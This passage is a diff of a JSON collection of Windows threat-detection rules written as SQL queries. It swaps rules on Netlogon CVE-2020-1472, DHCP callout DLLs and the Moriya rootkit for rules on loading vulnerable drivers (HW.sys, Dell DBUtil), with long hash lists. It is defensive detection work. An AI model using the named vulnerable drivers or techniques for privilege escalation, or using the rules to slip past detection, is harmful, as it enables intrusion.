'4045ae77859b1dbf13972451972eaaf6f3c97bea423e9e78f1c2f14330cd47ca', 'a7b000abbcc344444a9b00cfade7aa22ab92ce0cadec196c30eb1851ae4fa062', '1963d5a0e512b72353953aadbe694f73a9a576f0241a988378fa40bf574eda52', '3f2fda9a7a9c57b7138687bbce49a2e156d6095dddabb3454ea09737e02c3fa5', 'f8965fdce668692c3785afa3559159f9a18287bc0d53abb21902895a8ecf221b', '19a212e6fc324f4cb9ee5eba60f5c1fc0191799a4432265cbeaa3307c76a7fc0', '1aaf4c1e3cb6774857e2eef27c17e68dc1ae577112e4769665f516c2e8c4e27b', '0af5ccb3d33a9ba92071c9637be6254030d61998733a5eb3583e865e17844e05', '5bc3994612624da168750455b363f2964e1861dba4f1c305df01b970ac02a7ae', 'da6ca1fb539f825ca0f012ed6976baf57ef9c70143b7a1e88b4650bf7a925e24', '0fd2df82341bf5ebb8a53682e60d08978100c01acb0bed7b6ce2876ada80f670', '8111085022bda87e5f6aa4c195e743cc6dd6a3a6d41add475d267dc6b105a69f', 'be03e9541f56ac6ed1e81407dcd7cc85c0ffc538c3c2c2c8a9c747edbcf13100', '47f08f7d30d824a8f4bb8a98916401a37c0fd8502db308aba91fe3112b892dcc', 'a7c8f4faf3cbb088cac7753d81f8ec4c38ccb97cd9da817741f49272e8d01200', '7f375639a0df7fe51e5518cf87c3f513c55bc117db47d28da8c615642eb18bfa', 'a56c2a2425eb3a4260cc7fc5c8d7bed7a3b4cd2af256185f24471c668853aee8', 'a3e507e713f11901017fc328186ae98e23de7cea5594687480229f77d45848d8', 'ded2927f9a4e64eefd09d0caba78e94f309e3a6292841ae81d5528cab109f95d', '9529efb1837b1005e5e8f477773752078e0a46500c748bc30c9b5084d04082e6', '2bbe65cbec3bb069e92233924f7ee1f95ffa16173fceb932c34f68d862781250', '32e1a8513eee746d17eb5402fb9d8ff9507fb6e1238e7ff06f7a5c50ff3df993', '39cfde7d401efce4f550e0a9461f5fc4d71fa07235e1336e4f0b4882bd76550e', '984a77e5424c6d099051441005f2938ae92b31b5ad8f6521c6b001932862add7', 'db2a9247177e8cdd50fe9433d066b86ffd2a84301aa6b2eb60f361cfff077004', '30706f110725199e338e9cc1c940d9a644d19a14f0eb8847712cba4cacda67ab', '8c95d28270a4a314299cf50f05dcbe63033b2a555195d2ad2f678e09e00393e6', '9f4ce6ab5e8d44f355426d9a6ab79833709f39b300733b5b251a0766e895e0e5', 'd92eab70bcece4432258c9c9a914483a2267f6ab5ce2630048d3a99e8cb1b482', 'e4a7da2cf59a4a21fc42b611df1d59cae75051925a7ddf42bf216cc1a026eadb', '525d9b51a80ca0cd4c5889a96f857e73f3a80da1ffbae59851e0f51bdfb0b6cd', '01e024cb14b34b6d525c642a710bfa14497ea20fd287c39ba404b10a8b143ece', '4cff6e53430b81ecc4fae453e59a0353bcfe73dd5780abfc35f299c16a97998e', '3943a796cc7c5352aa57ccf544295bfd6fb69aae147bc8235a00202dc6ed6838', 'f8236fc01d4efaa48f032e301be2ebba4036b2cd945982a29046eca03944d2ae', '575e58b62afab094c20c296604dc3b7dd2e1a50f5978d8ee24b7dca028e97316', '3d9e83b189fcf5c3541c62d1f54a0da0a4e5b62c3243d2989afc46644056c8e3', '0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5', '082c39fe2e3217004206535e271ebd45c11eb072efde4cc9885b25ba5c39f91d', 'c0d88db11d0f529754d290ed5f4c34b4dba8c4f2e5c4148866daabeab0d25f9c', '7e0124fcc7c95fdc34408cf154cb41e654dade8b898c71ad587b2090b1da30d7', '61a1bdddd3c512e681818debb5bee94db701768fc25e674fcad46592a3259bd0', 'b03f26009de2e8eabfcf6152f49b02a55c5e5d0f73e01d48f5a745f93ce93a29', '45abdbcd4c0916b7d9faaf1cd08543a3a5178871074628e0126a6eda890d26e0', '2003b478b9fd1b3d76ec5bf4172c2e8915babbbee7ad1783794acbf8d4c2519d', '06bda5a1594f7121acd2efe38ccb617fbc078bb9a70b665a5f5efd70e3013f50', '1e8b0c1966e566a523d652e00f7727d8b0663f1dfdce3b9a09b9adfaef48d8ee', 'e7af7bcb86bd6bab1835f610671c3921441965a839673ac34444cf0ce7b2164e', '93d873cdf23d5edc622b74f9544cac7fe247d7a68e1e2a7bf2879fad97a3ae63', 'a9706e320179993dade519a83061477ace195daa1b788662825484813001f526', '61d6e40601fa368800980801a662a5b3b36e3c23296e8ae1c85726a56ef18cc8', '47eaebc920ccf99e09fc9924feb6b19b8a28589f52783327067c9b09754b5e84', 'fd8669794c67b396c12fc5f08e9c004fdf851a82faf302846878173e4fbecb03', '000547560fea0dd4b477eb28bf781ea67bf83c748945ce8923f90fdd14eb7a4b', 'a13054f349b7baa8c8a3fcbd31789807a493cc52224bbff5e412eb2bd52a6433', '07b6d69bafcfd767f1b63a490a8843c3bb1f8e1bbea56176109b5743c8f7d357', '9f1229cd8dd9092c27a01f5d56e3c0d59c2bb9f0139abf042e56f343637fda33', '99f4994a0e5bd1bf6e3f637d3225c69ff4cd620557e23637533e7f18d7d6cba1', '22be050955347661685a4343c51f11c7811674e030386d2264cd12ecbf544b7c', 'ece0a900ea089e730741499614c0917432246ceb5e11599ee3a1bb679e24fd2c', '8ef0ad86500094e8fa3d9e7d53163aa6feef67c09575c169873c494ed66f057f', '36b9e31240ab0341873c7092b63e2e0f2cab2962ebf9b25271c3a1216b7669eb', '6b830ea0db6546a044c9900d3f335e7820c2a80e147b0751641899d1a5aa8f74', '9c10e2ec4f9ef591415f9a784b93dc9c9cdafa7c69602c0dc860c5b62222e449', '5b9623da9ba8e5c80c49473f40ffe7ad315dcadffc3230afdc9d9226d60a715a', 'fafa1bb36f0ac34b762a10e9f327dcab2152a6d0b16a19697362d49a31e7f566', 'e61a54f6d3869b43c4eceac3016df73df67cce03878c5a6167166601c5d3f028', 'f88ebb633406a086d9cca6bc8b66a4ea940c5476529f9033a9e0463512a23a57', '2aa1b08f47fbb1e2bd2e4a492f5d616968e703e1359a921f62b38b8e4662f0c4', '06508aacb4ed0a1398a2b0da5fa2dbf7da435b56da76fd83c759a50a51c75caf', 'cc383ad11e9d06047a1558ed343f389492da3ac2b84b71462aee502a2fa616c8', '845f1e228de249fc1ddf8dc28c39d03e8ad328a6277b6502d3932e83b879a65a', '01aa278b07b58dc46c84bd0b1b5c8e9ee4e62ea0bf7a695862444af32e87f1fd', '64f9e664bc6d4b8f5f68616dd50ae819c3e60452efd5e589d6604b9356841b57', '2a652de6b680d5ad92376ad323021850dab2c653abf06edf26120f7714b8e08a', '85866e8c25d82c1ec91d7a8076c7d073cccf421cf57d9c83d80d63943a4edd94', '42851a01469ba97cdc38939b10cf9ea13237aa1f6c37b1ac84904c5a12a81fa0', '9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c', 'bb50818a07b0eb1bd317467139b7eb4bad6cd89053fecdabfeae111689825955', '9bb09752cf3a464455422909edef518ac18fe63cf5e1e8d9d6c2e68db62e0c87', 'b0eb4d999e4e0e7c2e33ff081e847c87b49940eb24a9e0794c6aa9516832c427', '43ba8d96d5e8e54cab59d82d495eeca730eeb16e4743ed134cdd495c51a4fc89', '76660e91f1ff3cb89630df5af4fe09de6098d09baa66b1a130c89c3c5edd5b22', '1c8dfa14888bb58848b4792fb1d8a921976a9463be8334cff45cc96f1276049a', '60c6f4f34c7319cb3f9ca682e59d92711a05a2688badbae4891b1303cd384813', 'bb1135b51acca8348d285dc5461d10e8f57260e7d0c8cc4a092734d53fc40cbc', '5c1585b1a1c956c7755429544f3596515dfdf928373620c51b0606a520c6245a', 'f40435488389b4fb3b945ca21a8325a51e1b5f80f045ab019748d0ec66056a8b', '405472a8f9400a54bb29d03b436ccd58cfd6442fe686f6d2ed4f63f002854659', '3a95cc82173032b82a0ffc7d2e438df64c13bc16b4574214c9fe3be37250925e', '42579a759f3f95f20a2c51d5ac2047a2662a2675b3fb9f46c1ed7f23393a0f00', '65db1b259e305a52042e07e111f4fa4af16542c8bacd33655f753ef642228890', '159e7c5a12157af92e0d14a0d3ea116f91c09e21a9831486e6dc592c93c10980', '5c04c274a708c9a7d993e33be3ea9e6119dc29527a767410dbaf93996f87369a', 'fcdfe570e6dc6e768ef75138033d9961f78045adca53beb6fdb520f6417e0df1', 'cb57f3a7fe9e1f8e63332c563b0a319b26c944be839eabc03e9a3277756ba612', '4744df6ac02ff0a3f9ad0bf47b15854bbebb73c936dd02f7c79293a2828406f6', '80cbba9f404df3e642f22c476664d63d7c229d45d34f5cd0e19c65eb41becec3', '29e0062a017a93b2f2f5207a608a96df4d554c5de976bd0276c2590a03bd3e94', 'db90e554ad249c2bd888282ecf7d8da4d1538dd364129a3327b54f8242dd5653', '8dafe5f3d0527b66f6857559e3c81872699003e0f2ffda9202a1b5e29db2002e', '101402d4f5d1ae413ded499c78a5fcbbc7e3bae9b000d64c1dd64e3c48c37558', '6ed35f310c96920a271c59a097b382da07856e40179c2a4239f8daa04eef38e7', '95d50c69cdbf10c9c9d61e64fe864ac91e6f6caa637d128eb20e1d3510e776d3', '37dde6bd8a7a36111c3ac57e0ac20bbb93ce3374d0852bcacc9a2c8c8c30079e', '5d530e111400785d183057113d70623e17af32931668ab7c7fc826f0fd4f91a3', 'd7bc7306cb489fe4c285bbeddc6d1a09e814ef55cf30bd5b8daf87a52396f102', '7049f3c939efe76a5556c2a2c04386db51daf61d56b679f4868bb0983c996ebb', 'b179e1ab6dc0b1aee783adbcad4ad6bb75a8a64cb798f30c0dd2ee8aaf43e6de', '3243aab18e273a9b9c4280a57aecef278e10bfff19abb260d7a7820e41739099', '0040153302b88bee27eb4f1eca6855039e1a057370f5e8c615724fa5215bada3', 'f0605dda1def240dc7e14efa73927d6c6d89988c01ea8647b671667b2b167008', 'b1334a71cc73b3d0c54f62d8011bec330dfc355a239bf94a121f6e4c86a30a2e', '74a846c61adc53692d3040aff4c1916f32987ad72b07fe226e9e7dbeff1036c4', '7f4555a940ce1156c9bcea9a2a0b801f9a5e44ec9400b61b14a7b1a6404ffdf6', 'c1c4310e5d467d24e864177bdbfc57cb5d29aac697481bfa9c11ddbeebfd4cc8', '22418016e980e0a4a2d01ca210a17059916a4208352c1018b0079ccb19aaf86a', '76b86543ce05540048f954fed37bdda66360c4a3ddb8328213d5aef7a960c184', 'dd4a1253d47de14ef83f1bc8b40816a86ccf90d1e624c5adf9203ae9d51d4097', '025e7be9fcefd6a83f4471bba0c11f1c11bd5047047d26626da24ee9a419cdc4', '50d5eaa168c077ce5b7f15b3f2c43bd2b86b07b1e926c1b332f8cb13bd2e0793', 'e05eeb2b8c18ad2cb2d1038c043d770a0d51b96b748bc34be3e7fc6f3790ce53', '749b0e8c8c8b7dda8c2063c708047cfe95afa0a4d86886b31a12f3018396e67c', 'd8459f7d707c635e2c04d6d6d47b63f73ba3f6629702c7a6e0df0462f6478ae2', '49f75746eebe14e5db11706b3e58accc62d4034d2f1c05c681ecef5d1ad933ba', '7133a461aeb03b4d69d43f3d26cd1a9e3ee01694e97a0645a3d8aa1a44c39129', 'ae79e760c739d6214c1e314728a78a6cb6060cce206fde2440a69735d639a0a2', '4422851a0a102f654e95d3b79c357ae3af1b096d7d1576663c027cfbc04abaf9', '84df20b1d9d87e305c92e5ffae21b10b325609d59d835a954dbd8750ef5dabf4', '7a7e8df7173387aec593e4fe2b45520ea3156c5f810d2bb1b2784efd1c922376', 'cd4a249c3ef65af285d0f8f30a8a96e83688486aab515836318a2559757a89bb', '86a8e0aa29a5b52c84921188cc1f0eca9a7904dcfe09544602933d8377720219', '47f0cdaa2359a63ad1389ef4a635f1f6eee1f63bdf6ef177f114bdcdadc2e005', '18e1707b319c279c7e0204074088cc39286007a1cf6cb6e269d5067d8d0628c6', '70211a3f90376bbc61f49c22a63075d1d4ddd53f0aefa976216c46e6ba39a9f4', '4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1', '8d9a2363b757d3f127b9c6ed8f7b8b018e652369bc070aa3500b3a978feaa6ce', '36875562e747136313ec5db58174e5fab870997a054ca8d3987d181599c7db6a', '7877c1b0e7429453b750218ca491c2825dae684ad9616642eff7b41715c70aca', '591bd5e92dfa0117b3daa29750e73e2db25baa717c31217539d30ffb1f7f3a52', '04a85e359525d662338cae86c1e59b1d7aa9bd12b920e8067503723dc1e03162', '4880f40f2e557cff38100620b9aa1a3a753cb693af16cd3d95841583edcb57a8', 'e81230217988f3e7ec6f89a06d231ec66039bdba340fd8ebb2bbb586506e3293', '49c827cf48efb122a9d6fd87b426482b7496ccd4a2dbca31ebbf6b2b80c98530', 'd8b58f6a89a7618558e37afc360cd772b6731e3ba367f8d58734ecee2244a530', '7ec93f34eb323823eb199fbf8d06219086d517d0e8f4b9e348d7afd41ec9fd5d', '2e6b339597a89e875f175023ed952aaac64e9d20d457bbc07acf1586e7fe2df8', 'cf3a7d4285d65bf8688215407bce1b51d7c6b22497f09021f0fce31cbeb78986', 'a7c2e7910942dd5e43e2f4eb159bcd2b4e71366e34a68109548b9fb12ac0f7cc', 'c5050a2017490fff7aa53c73755982b339ddb0fd7cef2cde32c81bc9834331c5', '59626cac380d8fe0b80a6d4c4406d62ba0683a2f0f68d50ad506ca1b1cf25347', '89b0017bc30cc026e32b758c66a1af88bd54c6a78e11ec2908ff854e00ac46be', 'e005e8d183e853a27ad3bb56f25489f369c11b0d47e3d4095aad9291b3343bf1', '5f5e5f1c93d961985624768b7c676d488c7c7c1d4c043f6fc1ea1904fefb75be', 'cdd2a4575a46bada4837a6153a79c14d60ee3129830717ef09e0e3efd9d00812', 'ac3f613d457fc4d44fa27b2e0b1baa62c09415705efb5a40a4756da39b3ac165', '475e5016c9c0f5a127896f9179a1b1577a67b357f399ab5a1e68aab07134729a', 'cc687fe3741bbde1dd142eac0ef59fd1d4457daee43cdde23bb162ef28d04e64', '0de4247e72d378713bcf22d5c5d3874d079203bb4364e25f67a90d5570bdcce8', '72b99147839bcfb062d29014ec09fe20a8f261748b5925b00171ef3cb849a4c1', 'cc586254e9e89e88334adee44e332166119307e79c2f18f6c2ab90ce8ba7fc9b', 'f05b1ee9e2f6ab704b8919d5071becbce6f9d0f9d0ba32a460c41d5272134abe', '5ee292b605cd3751a24e5949aae615d472a3c72688632c3040dc311055b75a92', '4429f32db1cc70567919d7d47b844a91cf1329a6cd116f582305f3b7b60cd60b', 'f8886a9c759e0426e08d55e410b02c5b05af3c287b15970175e4874316ffaf13', 'c9cf1d627078f63a36bbde364cd0d5f2be1714124d186c06db5bcdf549a109f8', '2da330a2088409efc351118445a824f11edbe51cf3d653b298053785097fe40e', '54841d9f89e195196e65aa881834804fe3678f1cf6b328cab8703edd15e3ec57', 'e6a7b0bc01a627a7d0ffb07faddb3a4dd96b6f5208ac26107bdaeb3ab1ec8217', 'cf4b5fa853ce809f1924df3a3ae3c4e191878c4ea5248d8785dc7e51807a512b', '6839fcae985774427c65fe38e773aa96ec451a412caa5354ad9e2b9b54ffe6c1', '708016fbe22c813a251098f8f992b177b476bd1bbc48c2ed4a122ff74910a965', '362c4f3dadc9c393682664a139d65d80e32caa2a97b6e0361dfd713a73267ecc', '08eb2d2aa25c5f0af4e72a7e0126735536f6c2c05e9c7437282171afe5e322c6', '2d83ccb1ad9839c9f5b3f10b1f856177df1594c66cbbc7661677d4b462ebf44d', 'c725919e6357126d512c638f993cf572112f323da359645e4088f789eb4c7b8c', '4941c4298f4560fc1e59d0f16f84bab5c060793700b82be2fd7c63735f1657a8', '1aaa9aef39cb3c0a854ecb4ca7d3b213458f302025e0ec5bfbdef973cca9111c', '76fb4deaee57ef30e56c382c92abffe2cf616d08dbecb3368c8ee6b02e59f303', '3a5ec83fe670e5e23aef3afa0a7241053f5b6be5e6ca01766d6b5f9177183c25', '7196187fb1ef8d108b380d37b2af8efdeb3ca1f6eefd37b5dc114c609147216d', 'f461414a2596555cece5cfee65a3c22648db0082ca211f6238af8230e41b3212', '55fee54c0d0d873724864dc0b2a10b38b7f40300ee9cae4d9baaf8a202c4049a', 'b9dad0131c51e2645e761b74a71ebad2bf175645fa9f42a4ab0e6921b83306e3', 'fd223833abffa9cd6cc1848d77599673643585925a7ee51259d67c44d361cce8', 'd5586dc1e61796a9ae5e5d1ced397874753056c3df2eb963a8916287e1929a71', '543991ca8d1c65113dff039b85ae3f9a87f503daec30f46929fd454bc57e5a91', '6cb51ae871fbd5d07c5aad6ff8eea43d34063089528603ca9ceb8b4f52f68ddc', '6c7120e40fc850e4715058b233f5ad4527d1084a909114fd6a36b7b7573c4a44', 'e75714f8e0ff45605f6fc7689a1a89c7dcd34aab66c6131c63fefaca584539cf', '4a3d4db86f580b1680d6454baee1c1a139e2dde7d55e972ba7c92ec3f555dce2', 'dec8a933dba04463ed9bb7d53338ff87f2c23cfb79e0e988449fc631252c9dcc', '6b5cf41512255237064e9274ca8f8a3fef820c45aa6067c9c6a0e6f5751a0421', 'e83908eba2501a00ef9e74e7d1c8b4ff1279f1cd6051707fd51824f87e4378fa', '0ebaef662b14410c198395b13347e1d175334ec67919709ad37d65eba013adff', '3e9b62d2ea2be50a2da670746c4dbe807db9601980af3a1014bcd72d0248d84c', '7d8937c18d6e11a0952e53970a0934cf0e65515637ac24d6ca52ccf4b93d385f', '9d58f640c7295952b71bdcb456cae37213baccdcd3032c1e3aeb54e79081f395', 'aa9ab1195dc866270e984f1bed5e1358d6ef24c515dfdb6c2a92d1e1b94bf608', '8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104', 'ea0b9eecf4ad5ec8c14aec13de7d661e7615018b1a3c65464bf5eca9bbf6ded3', '31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427', '258359a7fa3d975620c9810dab3a6493972876a024135feaf3ac8482179b2e79', '146d77e80ca70ea5cb17bfc9a5cea92334f809cbdc87a51c2d10b8579a4b9c88', '9790a7b9d624b2b18768bb655dda4a05a9929633cef0b1521e79e40d7de0a05b', 'cb9890d4e303a4c03095d7bc176c42dee1b47d8aa58e2f442ec1514c8f9e3cec', 'cbb8239a765bf5b2c1b6a5c8832d2cab8fef5deacadfb65d8ed43ef56d291ab6', '436ccab6f62fa2d29827916e054ade7acae485b3de1d3e5c6c62d3debf1480e7', 'b9a4e40a5d80fedd1037eaed958f9f9efed41eb01ada73d51b5dcd86e27e0cbf', 'b4d47ea790920a4531e3df5a4b4b0721b7fea6b49a35679f0652f1e590422602', '9fc29480407e5179aa8ea41682409b4ea33f1a42026277613d6484e5419de374', '81c7bb39100d358f8286da5e9aa838606c98dfcc263e9a82ed91cd438cb130d1', '552f70374715e70c4ade591d65177be2539ec60f751223680dfaccb9e0be0ed9', '81939e5c12bd627ff268e9887d6fb57e95e6049f28921f3437898757e7f21469', '4ab41816abbf14d59e75b7fad49e2cb1c1feb27a3cb27402297a2a4793ff9da7', 'af095de15a16255ca1b2c27dad365dff9ac32d2a75e8e288f5a1307680781685', 'b7a20b5f15e1871b392782c46ebcc897929443d82073ee4dcb3874b6a5976b5d', 'ea85bbe63d6f66f7efee7007e770af820d57f914c7f179c5fee3ef2845f19c41', '06a0ec9a316eb89cb041b1907918e3ad3b03842ec65f004f6fa74d57955573a4', '4e3eb5b9bce2fd9f6878ae36288211f0997f6149aa8c290ed91228ba4cdfae80', '314384b40626800b1cde6fbc51ebc7d13e91398be2688c2a58354aa08d00b073', '11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5', '4a9093e8dbcb867e1b97a0a67ce99a8511900658f5201c34ffb8035881f2dbbe', '38fa0c663c8689048726666f1c5e019feaa9da8278f1df6ff62da33961891d2a', '56a3c9ac137d862a85b4004f043d46542a1b61c6acb438098a9640469e2d80e7', '455bc98ba32adab8b47d2d89bdbadca4910f91c182ab2fc3211ba07d3784537b', 'e86cb77de7b6a8025f9a546f6c45d135f471e664963cf70b381bee2dfd0fdef4', '3ac5e01689a3d745e60925bc7faca8d4306ae693e803b5e19c94906dc30add46', 'b1d96233235a62dbb21b8dbe2d1ae333199669f67664b107bff1ad49b41d9414', 'dfaefd06b680f9ea837e7815fc1cc7d1f4cc375641ac850667ab20739f46ad22', '221dfbc74bbb255b0879360ccc71a74b756b2e0f16e9386b38a9ce9d4e2e34f9', 'afdd66562dea51001c3a9de300f91fc3eb965d6848dfce92ccb9b75853e02508', '78827fa00ea48d96ac9af8d1c1e317d02ce11793e7f7f6e4c7aac7b5d7dd490f', '7f190f6e5ab0edafd63391506c2360230af4c2d56c45fc8996a168a1fc12d457', 'd5562fb90b0b3deb633ab335bcbd82ce10953466a428b3f27cb5b226b453eaf3', 'fd33fb2735cc5ef466a54807d3436622407287e325276fcd3ed1290c98bd0533', 'f581decc2888ef27ee1ea85ea23bbb5fb2fe6a554266ff5a1476acd1d29d53af', '58a74dceb2022cd8a358b92acd1b48a5e01c524c3b0195d7033e4bd55eff4495', 'dde6f28b3f7f2abbee59d4864435108791631e9cb4cdfb1f178e5aa9859956d8', '21ccdd306b5183c00ecfd0475b3152e7d94b921e858e59b68a03e925d1715f21', '91314768da140999e682d2a290d48b78bb25a35525ea12c1b1f9634d14602b2c', '98b734dda78c16ebcaa4afeb31007926542b63b2f163b2f733fa0d00dbb344d8', 'd25904fbf907e19f366d54962ff543d9f53b8fdfd2416c8b9796b6a8dd430e26', '6f1ff29e2e710f6d064dc74e8e011331d807c32cc2a622cbe507fd4b4d43f8f4', '3326e2d32bbabd69feb6024809afc56c7e39241ebe70a53728c77e80995422a5', '8cb62c5d41148de416014f80bd1fd033fd4d2bd504cb05b90eeb6992a382d58f', '1d0397c263d51e9fc95bcc8baf98d1a853e1c0401cd0e27c7bf5da3fba1c93a8', '50db5480d0392a7dd6ab5df98389dc24d1ed1e9c98c9c35964b19dabcd6dc67f', '3ec5ad51e6879464dfbccb9f4ed76c6325056a42548d5994ba869da9c4c039a8', '71fe5af0f1564dc187eea8d59c0fbc897712afa07d18316d2080330ba17cf009', 'b47be212352d407d0ef7458a7161c66b47c2aec8391dd101df11e65728337a6a', '3871e16758a1778907667f78589359734f7f62f9dc953ec558946dcdbe6951e3', '65329dad28e92f4bcc64de15c552b6ef424494028b18875b7dba840053bc0cdd', 'a961f5939088238d76757669a9a81905e33f247c9c635b908daac146ae063499', '509628b6d16d2428031311d7bd2add8d5f5160e9ecc0cd909f1e82bbbb3234d6', '440883cd9d6a76db5e53517d0ec7fe13d5a50d2f6a7f91ecfc863bc3490e4f5c', '09bedbf7a41e0f8dabe4f41d331db58373ce15b2e9204540873a1884f38bdde1', '1ddfe4756f5db9fb319d6c6da9c41c588a729d9e7817190b027b38e9c076d219', '677c0b1add3990fad51f492553d3533115c50a242a919437ccb145943011d2bf', '823da894b2c73ffcd39e77366b6f1abf0ae9604d9b20140a54e6d55053aadeba', '05f052c64d192cf69a462a5ec16dda0d43ca5d0245900c9fcb9201685a2e7748', '42f0b036687cbd7717c9efed6991c00d4e3e7b032dc965a2556c02177dfdad0f', 'f8430bdc6fd01f42217d66d87a3ef6f66cb2700ebb39c4f25c8b851858cc4b35', '927c2a580d51a598177fa54c65e9d2610f5f212f1b6cb2fbf2740b64368f010a', 'e68d453d333854787f8470c8baef3e0d082f26df5aa19c0493898bcf3401e39a', 'eea53103e7a5a55dc1df79797395a2a3e96123ebd71cdd2db4b1be80e7b3f02b', '88076e98d45ed3adf0c5355411fe8ca793eb7cec1a1c61f5e1ec337eae267463', '9254f012009d55f555418ff85f7d93b184ab7cb0e37aecdfdab62cfe94dea96b')))" ], - "filename": "win_system_invoke_obfuscation_via_var_services.yml" + "filename": "driver_load_win_vuln_drivers.yml" }, { - "title": "Vulnerable Netlogon Secure Channel Connection Allowed", - "id": "a0cb7110-edf0-47a4-9177-541a4083128a", - "status": "test", - "description": "Detects that a vulnerable Netlogon secure channel connection was allowed, which could be an indicator of CVE-2020-1472.", - "author": "NVISO", + "title": "Vulnerable HW Driver Load", + "id": "9bacc538-d1b9-4d42-862e-469eafc05a41", + "status": "experimental", + "description": "Detects the load of a legitimate signed driver named HW.sys by often used by threat actors or malware for privilege escalation", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.privilege_escalation", - "attack.t1548" + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'NetLogon' AND EventID = '5829')" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\HW.sys' ESCAPE '\\' OR (Hashes LIKE '%SHA256=4880F40F2E557CFF38100620B9AA1A3A753CB693AF16CD3D95841583EDCB57A8%' ESCAPE '\\' OR Hashes LIKE '%SHA256=55963284BBD5A3297F39F12F0D8A01ED99FE59D008561E3537BCD4DB4B4268FA%' ESCAPE '\\' OR Hashes LIKE '%SHA256=6A4875AE86131A594019DEC4ABD46AC6BA47E57A88287B814D07D929858FE3E5%' ESCAPE '\\' OR Hashes LIKE '%SHA1=74E4E3006B644392F5FCEA4A9BAE1D9D84714B57%' ESCAPE '\\' OR Hashes LIKE '%SHA1=18F34A0005E82A9A1556BA40B997B0EAE554D5FD%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4E56E0B1D12664C05615C69697A2F5C5D893058A%' ESCAPE '\\' OR Hashes LIKE '%MD5=3247014BA35D406475311A2EAB0C4657%' ESCAPE '\\' OR Hashes LIKE '%MD5=376B1E8957227A3639EC1482900D9B97%' ESCAPE '\\' OR Hashes LIKE '%MD5=45C2D133D41D2732F3653ED615A745C8%' ESCAPE '\\') OR sha256 IN ('4880f40f2e557cff38100620b9aa1a3a753cb693af16cd3d95841583edcb57a8', '55963284bbd5a3297f39f12f0d8a01ed99fe59d008561e3537bcd4db4b4268fa', '6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5') OR sha1 IN ('74e4e3006b644392f5fcea4a9bae1d9d84714b57', '18f34a0005e82a9a1556ba40b997b0eae554d5fd', '4e56e0b1d12664c05615c69697a2f5c5d893058a') OR md5 IN ('3247014ba35d406475311a2eab0c4657', '376b1e8957227a3639ec1482900d9b97', '45c2d133d41d2732f3653ed615a745c8')))" ], - "filename": "win_system_vul_cve_2020_1472.yml" + "filename": "driver_load_win_vuln_hw_driver.yml" }, { - "title": "DHCP Server Loaded the CallOut DLL", - "id": "13fc89a9-971e-4ca6-b9dc-aa53a445bf40", + "title": "Suspicious Driver Load from Temp", + "id": "2c4523d5-d481-4ed0-8ec3-7fbf0cb41a75", "status": "test", - "description": "This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded", - "author": "Dimitrios Slamaris", + "description": "Detects a driver load from a temporary directory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Unknown" + "There is a relevant set of false positives depending on applications in the environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '1033' AND Provider_Name = 'Microsoft-Windows-DHCP-Server')" + "SELECT * FROM logs WHERE (EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ImageLoaded LIKE '%\\\\Temp\\\\%' ESCAPE '\\')" ], - "filename": "win_system_susp_dhcp_config.yml" + "filename": "driver_load_win_susp_temp_use.yml" }, { - "title": "Moriya Rootkit - System", - "id": "25b9c01c-350d-4b95-bed1-836d04a4f324", + "title": "Vulnerable Dell BIOS Update Driver Load", + "id": "21b23707-60d6-41bb-96e3-0f0481b0fed9", "status": "experimental", - "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", - "author": "Bhabesh Raj", - "tags": [ - "attack.persistence", + "description": "Detects the load of the vulnerable Dell BIOS update driver as reported in CVE-2021-21551", + "author": "Florian Roth (Nextron Systems)", + "tags": [ "attack.privilege_escalation", - "attack.t1543.003" + "cve.2021.21551", + "attack.t1543", + "attack.t1068" ], "falsepositives": [ - "Unknown" + "Legitimate BIOS driver updates (should be rare)" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'ZzNetSvc')" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\DBUtil\\_2\\_3.Sys%' ESCAPE '\\' OR (Hashes LIKE '%SHA256=0296E2CE999E67C76352613A718E11516FE1B0EFC3FFDB8918FC999DD76A73A5%' ESCAPE '\\' OR Hashes LIKE '%SHA256=DDBF5ECCA5C8086AFDE1FB4F551E9E6400E94F4428FE7FB5559DA5CFFA654CC1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=C948AE14761095E4D76B55D9DE86412258BE7AFD%' ESCAPE '\\' OR Hashes LIKE '%SHA1=10B30BDEE43B3A2EC4AA63375577ADE650269D25%' ESCAPE '\\' OR Hashes LIKE '%MD5=C996D7971C49252C582171D9380360F2%' ESCAPE '\\' OR Hashes LIKE '%MD5=D2FD132AB7BBC6BBB87A84F026FA0244%' ESCAPE '\\') OR sha256 IN ('0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5', 'ddbf5ecca5c8086afde1fb4f551e9e6400e94f4428fe7fb5559da5cffa654cc1') OR sha1 IN ('c948ae14761095e4d76b55d9de86412258be7afd', '10b30bdee43b3a2ec4aa63375577ade650269d25') OR md5 IN ('c996d7971c49252c582171d9380360f2', 'd2fd132ab7bbc6bbb87a84f026fa0244')))" ], - "filename": "win_system_moriya_rootkit.yml" + "filename": "driver_load_win_vuln_dell_driver.yml" }, { - 